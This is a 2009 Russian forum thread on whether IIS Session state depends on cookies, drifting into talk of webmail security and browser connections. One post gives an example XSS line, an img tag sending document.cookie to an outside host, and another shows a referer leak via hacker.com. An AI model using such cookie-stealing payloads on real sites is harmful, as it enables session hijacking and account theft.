Форум программистов, компьютерный форум, киберфорум
C#: Web, ASP.NET
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск  
 
 
Рейтинг 4.98/40: Рейтинг темы: голосов - 40, средняя оценка - 4.98
0 / 0 / 0
Регистрация: 07.12.2008
Сообщений: 43

Правда или нет что объект Session в IIS работает через cookie?

30.01.2009, 18:37. Показов 8040. Ответов 57
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
А вот скажите - правда или нет что объект Session в IIS работает через cookie?
0
IT_Exp
Эксперт
34794 / 4073 / 2104
Регистрация: 17.06.2006
Сообщений: 32,602
Блог
30.01.2009, 18:37
Ответы с готовыми решениями:

Проверка если пользователь Онлайн / Хранение его ID в Session или Cookie
В общем пишу онлайн чат. На странице чата есть список онлайн и оффлайн юзеров (тянутся из БД) Пока что делаю иммитацию онлайн - просто...

Правда, что Apache работает стабильнее чем IIS?
Правда, что apache работает стабильнее чем IIS?

Как сохранить массив в session или cookie
Здравствуйте помогите разобраться как записать массив в сесию или куки чтоб в дальнейшем с помощью php его обработать. На странице...

57
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:16
Студворк — интернет-сервис помощи студентам
Напримемре дырявых почтовых служб :
все что нам нужно так это что бы у клиента при открытии
письма нарисовался следующий <img id = X src='javascript:X.src = 'www.pp.rr.cc?data=' + document.cookie + '&data2=' & document.location'>

www.pp.rr.cc считает данные и отрисует картинку.

Это я от балды написал , но идея примерно такая
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:26
Конечно не идиоты сидят и в Sun и Microsoft/
Но согласитесь что не просто так постоянно выходят обнавления.
Да и за всем не уследишь. Поэтому я придерживаюсь мнения -
нашел чего, оповести производителя.
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 11:30
2 AmbX:
совеременные почтовые службы такие от таких ходов давно защищены
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:35
А то я гляжу - чего это я тут
уже на 4-ю страницу форума распинаюсь, а они оказывается защещины.
И давно ?
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 11:35
2 AmbX:
можно даже проще, без javascript, просто ссылка на картинку
при запросе будет посылаться http referer, c document.location
<img src=http://www.hacker.com/gif.gif>

но от этого, тоже нашли способ, все внешние ссылки идут сначала через сервер почтовой службы

<img src=http://www.yahoo.com?url=http://www.hacker.com/gif.gif>
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:39
А так не пройдет потаму что на картинку открывается
новое соединение в свободном потоке. Это соединение причем не является
дочерним (т.е. не наследует права радителя)
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 11:43
почему новое соединение?
в современных браузерах и веб-серверах не открывается.
и для чего ему права наследовать?
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:50
Вы вероятно заметели что каждый IMG IFRAME APPLET .....
загружается в своем потоке и в своем соединении. Т.е. загрузка одного IMG не влияет на главный поток обработки сообщений, они загружаются паралельно.
А почему так - потаму что оно действительно работает именно так.
Каждый контролл отвечает за себя сам: сам себя рисет , подгружает.

Новое соединение не получает прова паралельного соединения. Права передаются на уровне приложений Браузеров , а не соединений.
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:53
Да и еще потаму что если поставить перехват на
cетевые WIN API то сразу станет видно сколько соединений открывается при запросе на 1 - URL и что каждое из них гоняет в HTTP загаловке.
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 11:56
На счет прав Вы меня не допоняли.
Я имел ввиду что права не наследуются потаму что их не зачем наследовать.
Права - достаточно условно, на низком уровне: в HTTP не гонится общая служебная информация родителя.
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 15:05
2 AbmX:
>>Вы вероятно заметели что каждый IMG IFRAME APPLET .....
>>загружается в своем потоке и в своем соединении.
нет, не замечал, что еще за потоки?

уже давно для браузера есть пул соединений и далеко не для каждой картинки открывается свое соединение. Есть такой заголовок Keep-Alive называется, который и определяет убивать соединение или оставить.

всякие права родительских и дочерних потоков, значения не имеют
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 15:19
Ну раз уж вы завели разгавор сами
то рекомендую обратиться за документацией по теме
Keep-Alive with Worker Thread.
А также обратить внимание на то что Keep-Alive поддерживается большинством браузеров и серверов.

Надеюсь вопросы об открытии соединений в свободных потоках
Вам станет немного яснее.
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 15:20
Опечатался :

Keep-Alive НЕ поддерживается большинством браузеров и серверов.
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 15:45
а зачем мне обращать внимание на открытие соединений в свободных потоках? разве это влияет на то, какие http заголовки передаются? нет, не влияет.

А метод взлома с картинкой на другом сервере многократно описан в литературе по безопасности.

Keep-Alive поддерживают Apache и IIS, IE, Netscape, Mozilla, Opera
так что вполне достаточно
0
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
08.02.2009, 16:01
Боюсь мне долго придется обьеснять как это работает.
И придется видимо с самого начала.
Поэтому я решил закрыть обсуждение этой темы, за ее бесполезностью.

На счет взлома - я вам елементарный пример , а вы мне говорите что
это давно закрытая дыра. Не понимаю Вам не достаточно идеи ?
Или может хотите описание еще не закрытой дыры, так я вам его не дам.
Глубже надо мыслить. Когда есть идея , можно найти много способов ее реализации.

Спасибо за дискуссию, надеюсь ни кто не устал.
0
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
08.02.2009, 16:37
>>Боюсь мне долго придется обьеснять как это работает
что это-то?

>>На счет взлома - я вам елементарный пример , а вы мне говорите что это давно закрытая дыра.
То что, вы знаете методы взлома почты с веб-интерфейсом это очень хорошо. С другой стороны, кто их сейчас не знает... Вот вы этот свой пример для чего привели-то?

Что с куки, что без них пользователям нужны услуги почты с веб-интерфейсом. А производитель должен обеспечить защиту его учетной записи. Если бы можно было обойтись только одной веб-страничкой для организации подобной услуги, тогда сессии бы не понадобились. Но пользователю нужен достаточно богатый интерфейс, он переходит со страницы на страницу, оставаясь при этом 'внутри' одного приложения.
Так что без сессий, т.е. 'отслеживания' пользователя не обойтись.
Тоже самое во многих других веб-приложениях.

Отключение же пользователем у себя куки вовсе не обеспечивает ему защиту, для этого проще совсем не подключаться к сети и не пользоваться веб-почтой.

Пользователь отключает у себя куки, не потому что не хочет иметь сессий - он про них может и не слышал. Он хочет защитить свою приватность. При этом как водится с водой выплескивают и ребенка.
Если постоянный куки - действительно, в некотором роде, зло, то сессионные - непостоянные куки вполне полезны, а вот много информации о пользователе из них не почерпнешь
0
0 / 0 / 0
Регистрация: 26.07.2007
Сообщений: 24
28.03.2009, 22:05
Если в Securiry настройках отключить Session-Cookies - то переменные Session не сохраняются, то есть они работают через cookies. Есть пункт в IE: Tools-->Internet Options-->Security-->Custom Level и там Allow per-session cookies должно быть Enabled. Иначе Session не работает.
0
al
03.04.2009, 04:12
to alex78rus:
явнo ты не читaл предыдущие 4 стрaницы пoстoв, уже всё рaзжевaли 10 рaз и выплюнули
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
BasicMan
Эксперт
29316 / 5623 / 2384
Регистрация: 17.02.2009
Сообщений: 30,364
Блог
03.04.2009, 04:12

COOKIE, SESSION, и всё что связано с их кражей и защитой
Вчера немного разобрался по какому принципу происходит авторизация на сайтах. Возник вопрос: Есть самый обычный сайт, без наворотов...

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent
Пытаюсь сделать корзину товаров, проблема с session_start выдает вот такую ошибку: Warning: session_start() : Cannot send session cookie -...

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by
session_start(); if (!isset($_SESSION)) $_SESSION=0; echo &quot;вы обновили страницу &quot;.$_SESSION++.&quot; раз. &quot;; echo &quot;&lt;br&gt;&lt;a...

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent
Открыл движок а точне файл index.php та начало кода &lt;?php /** * Файл index.php расположен в корне CMS является единственной...

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent
У меня на компе все ОК, но после загрузки на хост получаю предупреждения и нечего не работает Warning: session_start() : Cannot send...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
58
Ответ Создать тему
Новые блоги и статьи
Саморегулирующийся социальный контракт для сервера cross-section.
Hrethgir 14.08.2026
С кодом конечно таких глубоких размышлений пока не было, впрочем я уже привык к алгоритмизации. Суть предмета записи: снова в диалоге с нейросетью (я взял пока себе ник для учётки админа - Rector). . . .
Часы электронные
Uhbif79 12.08.2026
Выкладываю программу часов. Программа позволяет: 1. Использовать системное время и дату, 2. Есть возможность вводить время и дату вручную. 3. Реализованы 2 будильника: начало и конец рабочего дня. . . .
Часы с будильником на основе класса QLCDNumber
Uhbif79 12.08.2026
Всем добрый день, выкладываю программу часов с будильником на основе класса QLCDNumber. Здесь я пробовал самостоятельно создавал классы, впервые столкнулся с видимостью переменной одного класса из. . .
Установка MinGW GCC 16.2 и CMake
8Observer8 10.08.2026
VK Видео: https:/ / vkvideo. ru/ video-240781534_456239017 YouTube: eY5-5PyI9NM Текстовая версия
Неделя из жизни имитационной модели склада: мои кривые руки растут, откуда надо
anaschu 10.08.2026
Неделя из жизни имитационной модели склада: как я почти написал неправильную логику и что с этим делать Работаю сейчас над учебно-рабочим проектом: строю в AnyLogic имитационную модель процессов. . .
Калькулятор для расчета родства
russiannick 07.08.2026
1. Задача: Создать калькулятор для расчета родства. Родственных связей существует 8 ступеней, такие как: p - отец P - мать q - муж Q - жена b - брат B - сестра s - сын S - дочь
Мир по моей воле
kumehtar 07.08.2026
Когда-то кажется, что всё просто. Ты весь такой светлый. Причиняешь добро. Борешься за справедливость в этом тёмном мире. Потом начинаешь замечать одну неприятную вещь. Почти каждый хороший. . .
Кредитный калькулятор
Maks 05.08.2026
Решение задачи по прикладной информатике средствами 1С. Задача: Напишите приложение-калькулятор, которое помогает рассчитывать параметры кредита для аннуитетного и дифференцированного видов. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru